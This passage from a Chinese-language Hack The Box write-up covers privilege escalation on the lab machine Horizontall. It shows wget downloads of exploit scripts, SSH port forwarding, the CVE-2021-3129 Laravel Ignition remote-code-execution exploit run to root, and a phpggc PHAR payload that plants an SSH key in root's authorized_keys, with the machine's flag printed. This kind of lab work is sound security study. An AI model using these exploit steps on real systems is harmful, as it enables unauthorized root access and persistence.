                                <div class="ml-4 text-lg leading-7 font-semibold"><a href="https://laravel-news.com/" class="underline text-gray-900 dark:text-white">Laravel News</a></div>
                            </div>

                            <div class="ml-12">
                                <div class="mt-2 text-gray-600 dark:text-gray-400 text-sm">
                                    Laravel News is a community driven portal and newsletter aggregating all of the latest and most important news in the Laravel ecosystem, including new package releases and tutorials.
                                </div>
                            </div>
                        </div>

                        <div class="p-6 border-t border-gray-200 dark:border-gray-700 md:border-l">
                            <div class="flex items-center">
                                <svg fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" class="w-8 h-8 text-gray-500"><path d="M3.055 11H5a2 2 0 012 2v1a2 2 0 002 2 2 2 0 012 2v2.945M8 3.935V5.5A2.5 2.5 0 0010.5 8h.5a2 2 0 012 2 2 2 0 104 0 2 2 0 012-2h1.064M15 20.488V18a2 2 0 012-2h3.064M21 12a9 9 0 11-18 0 9 9 0 0118 0z"></path></svg>
                                <div class="ml-4 text-lg leading-7 font-semibold text-gray-900 dark:text-white">Vibrant Ecosystem</div>
                            </div>

                            <div class="ml-12">
                                <div class="mt-2 text-gray-600 dark:text-gray-400 text-sm">
                                    Laravel's robust library of first-party tools and libraries, such as <a href="https://forge.laravel.com" class="underline">Forge</a>, <a href="https://vapor.laravel.com" class="underline">Vapor</a>, <a href="https://nova.laravel.com" class="underline">Nova</a>, and <a href="https://envoyer.io" class="underline">Envoyer</a> help you take your projects to the next level. Pair them with powerful open source libraries like <a href="https://laravel.com/docs/billing" class="underline">Cashier</a>, <a href="https://laravel.com/docs/dusk" class="underline">Dusk</a>, <a href="https://laravel.com/docs/broadcasting" class="underline">Echo</a>, <a href="https://laravel.com/docs/horizon" class="underline">Horizon</a>, <a href="https://laravel.com/docs/sanctum" class="underline">Sanctum</a>, <a href="https://laravel.com/docs/telescope" class="underline">Telescope</a>, and more.
                                </div>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="flex justify-center mt-4 sm:items-center sm:justify-between">
                    <div class="text-center text-sm text-gray-500 sm:text-left">
                        <div class="flex items-center">
                            <svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="-mt-px w-5 h-5 text-gray-400">
                                <path d="M3 3h2l.4 2M7 13h10l4-8H5.4M7 13L5.4 5M7 13l-2.293 2.293c-.63.63-.184 1.707.707 1.707H17m0 0a2 2 0 100 4 2 2 0 000-4zm-8 2a2 2 0 11-4 0 2 2 0 014 0z"></path>
                            </svg>

                            <a href="https://laravel.bigcartel.com" class="ml-1 underline">
                                Shop
                            </a>

                            <svg fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" class="ml-4 -mt-px w-5 h-5 text-gray-400">
                                <path d="M4.318 6.318a4.5 4.5 0 000 6.364L12 20.364l7.682-7.682a4.5 4.5 0 00-6.364-6.364L12 7.636l-1.318-1.318a4.5 4.5 0 00-6.364 0z"></path>
                            </svg>

                            <a href="https://github.com/sponsors/taylorotwell" class="ml-1 underline">
                                Sponsor
                            </a>
                        </div>
                    </div>

                    <div class="ml-4 text-center text-sm text-gray-500 sm:text-right sm:ml-0">
                            Laravel v8 (PHP v7.4.18)
                    </div>
                </div>
            </div>
        </div>
    </body>
</html>
strapi@horizontall:~/myapi$

20、在这里，我们发现了当前网站的版本信息

1	`Laravel v8 (PHP v7.4.18)`

21、开始检索相关漏洞信息

22、这里我根据发现的漏洞利用工具，进行漏洞尝试使用

https://github.com/ambionics/laravel-exploits

┌──(kali㉿kali)-[~/桌面]
└─$ touch laravel-ignition-rce.py

┌──(kali㉿kali)-[~/桌面]
└─$ python3 -m http.server 80                                 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.105 - - [26/Dec/2023 23:05:28] "GET /laravel-ignition-rce.py HTTP/1.1" 200 -

strapi@horizontall:~/myapi$ wget http://10.10.14.2/laravel-ignition-rce.py
wget http://10.10.14.2/laravel-ignition-rce.py
--2023-12-26 15:05:28--  http://10.10.14.2/laravel-ignition-rce.py
Connecting to 10.10.14.2:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4684 (4.6K) [text/x-python]
Saving to: ‘laravel-ignition-rce.py’

laravel-ignition-rc 100%[===================>]   4.57K  --.-KB/s    in 0.001s  

2023-12-26 15:05:29 (3.82 MB/s) - ‘laravel-ignition-rce.py’ saved [4684/4684]

strapi@horizontall:~/myapi$ php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id
<exploit.phar --fast-destruct monolog/rce1 system id
Could not open input file: ./phpggc
strapi@horizontall:~/myapi$ ls
ls
api     extensions               node_modules       public
build   favicon.ico              package.json       README.md
config  laravel-ignition-rce.py  package-lock.json
strapi@horizontall:~/myapi$

https://www.ambionics.io/blog/laravel-debug-rce

https://github.com/nth347/CVE-2021-3129_exploit

┌──(kali㉿kali)-[~/桌面]
└─$ touch poc.py

┌──(kali㉿kali)-[~/桌面]
└─$ python3 -m http.server 80                                 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.105 - - [26/Dec/2023 23:05:28] "GET /laravel-ignition-rce.py HTTP/1.1" 200 -
10.10.11.105 - - [26/Dec/2023 23:17:51] "GET /poc.py HTTP/1.1" 200 -

strapi@horizontall:~/myapi$ wget http://10.10.14.2/poc.py

wget http://10.10.14.2/poc.py
--2023-12-26 15:17:51--  http://10.10.14.2/poc.py
Connecting to 10.10.14.2:80... 
connected.
HTTP request sent, awaiting response... 200 OK
Length: 2935 (2.9K) [text/x-python]
Saving to: ‘poc.py’

poc.py              100%[===================>]   2.87K  --.-KB/s    in 0.001s  

2023-12-26 15:17:52 (3.88 MB/s) - ‘poc.py’ saved [2935/2935]

strapi@horizontall:~/myapi$ 
strapi@horizontall:~/myapi$ chmod +x poc.py
chmod +x poc.py
strapi@horizontall:~/myapi$ ./exploit.py http://localhost:8000 Monolog/RCE1 id
< ./exploit.py http://localhost:8000 Monolog/RCE1 id
bash: ./exploit.py: No such file or directory
strapi@horizontall:~/myapi$ ./poc.py http://localhost:8000 Monolog/RCE1 id
./poc.py http://localhost:8000 Monolog/RCE1 id
[i] Trying to clear logs
[+] Logs cleared
[i] PHPGGC not found. Cloning it
Cloning into 'phpggc'...
fatal: unable to access 'https://github.com/ambionics/phpggc.git/': Could not resolve host: github.com
[-] Fail to convert logs to PHAR
[i] There is no output
[i] Trying to clear logs
[+] Logs cleared
strapi@horizontall:~/myapi$

23、看来靶场环境恶劣啊，还是做个ssh 把端口给转发出来吧，这里的思路是，把我们的kali里的公钥放到目标当前用户的靶机里，然后使用ssh进行登录

strapi@horizontall:~/myapi$ ls -la /home
ls -la /home
total 12
drwxr-xr-x  3 root      root      4096 May 25  2021 .
drwxr-xr-x 24 root      root      4096 Aug 23  2021 ..
drwxr-xr-x  8 developer developer 4096 Aug  2  2021 developer
strapi@horizontall:~/myapi$ ls -la /home/developer/.ssh
ls -la /home/developer/.ssh
ls: cannot open directory '/home/developer/.ssh': Permission denied
strapi@horizontall:~/myapi$ cd ../
cd ../
strapi@horizontall:~$ ls
ls
myapi
strapi@horizontall:~$ ls -la 
ls -la 
total 48
drwxr-xr-x 9 strapi strapi 4096 Aug  2  2021 .
drwxr-xr-x 3 root   root   4096 May 26  2021 ..
-rw-r--r-- 1 strapi strapi  231 Jun  1  2021 .bash_logout
-rw-r--r-- 1 strapi strapi 3810 Jun  1  2021 .bashrc
drwx------ 2 strapi strapi 4096 May 26  2021 .cache
drwx------ 3 strapi strapi 4096 May 26  2021 .config
drwx------ 3 strapi strapi 4096 May 26  2021 .gnupg
drwxrwxr-x 3 strapi strapi 4096 Jun  1  2021 .local
drwxr-xr-x 9 strapi strapi 4096 Dec 26 15:18 myapi
drwxrwxr-x 5 strapi strapi 4096 Jun  3  2021 .npm
drwxrwxr-x 5 strapi strapi 4096 Dec 26 13:36 .pm2
-rw-r--r-- 1 strapi strapi  807 Apr  4  2018 .profile
strapi@horizontall:~$ mkdir .ssh
mkdir .ssh
strapi@horizontall:~$ cd .ssh/
cd .ssh/
strapi@horizontall:~/.ssh$ 

┌──(kali㉿kali)-[~/.ssh]
└─$ cat id_rsa.pub 

strapi@horizontall:~/.ssh$ echo "ssh-rsa AAAEmopirH5MZzROwVXA3 kali@kali" >> authorized_keys
<QAEEmopirH5MZzROwVXA3 kali@kali" >> authorized_keys
strapi@horizontall:~/.ssh$ ls
ls
authorized_keys
strapi@horizontall:~/.ssh$

24、然后我们开始端口和转发

┌──(kali㉿kali)-[~/.ssh]
└─$ ssh -L 8000:127.0.0.1:8000 strapi@10.10.11.105 -i ../.ssh/id_rsa
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Dec 26 15:29:23 UTC 2023

  System load:  0.03              Processes:           179
  Usage of /:   82.2% of 4.85GB   Users logged in:     0
  Memory usage: 28%               IP address for eth0: 10.10.11.105
  Swap usage:   0%


0 updates can be applied immediately.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


Last login: Fri Jun  4 11:29:42 2021 from 192.168.1.15
$ id
uid=1001(strapi) gid=1001(strapi) groups=1001(strapi)
$

25、我们查看下8000端口的页面是什么样子的

http://127.0.0.1:8000/

26、然后我们开始本机构造利用代码

┌──(kali㉿kali)-[~/桌面]
└─$ git clone https://github.com/nth347/CVE-2021-3129_exploit.git
正克隆到 'CVE-2021-3129_exploit'...
remote: Enumerating objects: 9, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 9 (delta 1), reused 3 (delta 0), pack-reused 0
接收对象中: 100% (9/9), 完成.
处理 delta 中: 100% (1/1), 完成.

┌──(kali㉿kali)-[~/桌面]
└─$ cd CVE-2021-3129_exploit

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit]
└─$ chmod +x exploit.py

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit]
└─$ ./exploit.py http://localhost:8000 Monolog/RCE1 id
[i] Trying to clear logs
[+] Logs cleared
[i] PHPGGC not found. Cloning it
正克隆到 'phpggc'...
remote: Enumerating objects: 4112, done.
remote: Counting objects: 100% (965/965), done.
remote: Compressing objects: 100% (379/379), done.
remote: Total 4112 (delta 639), reused 721 (delta 561), pack-reused 3147
接收对象中: 100% (4112/4112), 575.11 KiB | 153.00 KiB/s, 完成.
处理 delta 中: 100% (1796/1796), 完成.
[+] Successfully converted logs to PHAR
[+] PHAR deserialized. Exploited

uid=0(root) gid=0(root) groups=0(root)

[i] Trying to clear logs
[+] Logs cleared

27、可以发现能进行root权限的，我们尝试下看下root.txt的文件内容

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit]
└─$ ./exploit.py http://localhost:8000 Monolog/RCE1 "cat /root/root.txt"
[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[+] PHAR deserialized. Exploited

27b7d33ec67ae27cd030c9a9e6213ea0

[i] Trying to clear logs
[+] Logs cleared

28、其实到这里对于hack the box 来说已经就可以，但是对于 oscp 来说，是需要交互shell，而这个工具还是不支持的，所以又回到一开始的方法，本地创建吧。

29、这里使用 https://github.com/ambionics/laravel-exploits 进行构造一个存有我们ssh公钥的 ssh.phar 文件，由于我们前期构造的时候缺少 phpggc 文件，这里可以直接使用 https://github.com/nth347/CVE-2021-3129_exploit 里的这个文件进行生成

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit]
└─$ ls
exploit.py  phpggc  README.md

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit]
└─$ cd phpggc    

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit/phpggc]
└─$ ls
Dockerfile    lib      phpggc     templates
gadgetchains  LICENSE  README.md  test-gc-compatibility.py

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit/phpggc]
└─$ ls -la        
总计 80
drwxr-xr-x  6 kali kali  4096 12月26日 23:50 .
drwxr-xr-x  4 kali kali  4096 12月26日 23:49 ..
-rw-r--r--  1 kali kali   369 12月26日 23:50 Dockerfile
drwxr-xr-x 38 kali kali  4096 12月26日 23:50 gadgetchains
drwxr-xr-x  8 kali kali  4096 12月26日 23:50 .git
drwxr-xr-x  3 kali kali  4096 12月26日 23:50 lib
-rw-r--r--  1 kali kali 11358 12月26日 23:50 LICENSE
-rwxr-xr-x  1 kali kali   247 12月26日 23:50 phpggc
-rw-r--r--  1 kali kali 18279 12月26日 23:50 README.md
drwxr-xr-x  2 kali kali  4096 12月26日 23:50 templates
-rwxr-xr-x  1 kali kali 14112 12月26日 23:50 test-gc-compatibility.py

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit/phpggc]
└─$ php -d'phar.readonly=0' ./phpggc --phar phar -o ssh.phar --fast-destruct monolog/rce1 system 'mkdir -p /root/.ssh; echo "ssh-rsa AAAAB3NQAEEmopirH5MZzROwVXA3 kali@kali" >> /root/.ssh/authorized_keys'

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit/phpggc]
└─$ ls    
Dockerfile    lib      phpggc     ssh.phar   test-gc-compatibility.py
gadgetchains  LICENSE  README.md  templates

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit/phpggc]
└─$ cp ~/桌面/laravel-ignition-rce.py ./laravel-ignition-rce.py

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit/phpggc]
└─$ ls
Dockerfile    laravel-ignition-rce.py  LICENSE  README.md  templates
gadgetchains  lib                      phpggc   ssh.phar   test-gc-compatibility.py

┌──(kali㉿kali)-[~/桌面/CVE-2021-3129_exploit/phpggc]
└─$ python3 ./laravel-ignition-rce.py http://127.0.0.1:8000 ssh.phar
+ Log file: /home/developer/myproject/storage/logs/laravel.log
+ Logs cleared
+ Successfully converted to PHAR !
+ Phar deserialized
Exploit succeeded
+ Logs cleared

30、到这里，我们已经把我们的公钥放到目标root权限用户下了，我们直接使用ssh进行登录吧

┌──(kali㉿kali)-[~/.ssh]
└─$ ssh root@10.10.11.105 -i ../.ssh/id_rsa 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Dec 26 16:12:54 UTC 2023

  System load:  0.0               Processes:           180
  Usage of /:   82.2% of 4.85GB   Users logged in:     0
  Memory usage: 28%               IP address for eth0: 10.10.11.105
  Swap usage:   0%

0 updates can be applied immediately.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Aug 23 11:27:49 2021 from 10.10.14.6
root@horizontall:~# ls
boot.sh  pid  restart.sh  root.txt
root@horizontall:~# cat root.txt
27b7d33ec67ae27cd030c9a9e6213ea0
root@horizontall:~# id
uid=0(root) gid=0(root) groups=0(root)
root@horizontall:~#

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/374

打靶记

#shooting-range

Horizontall-htb-writeup

https://sh1yan.top/2023/12/26/Horizontall-htb-writeup/

作者

shiyan

发布于

2023年12月26日

许可协议

Pandora-htb-writeup 上一篇

Previse-htb-writeup 下一篇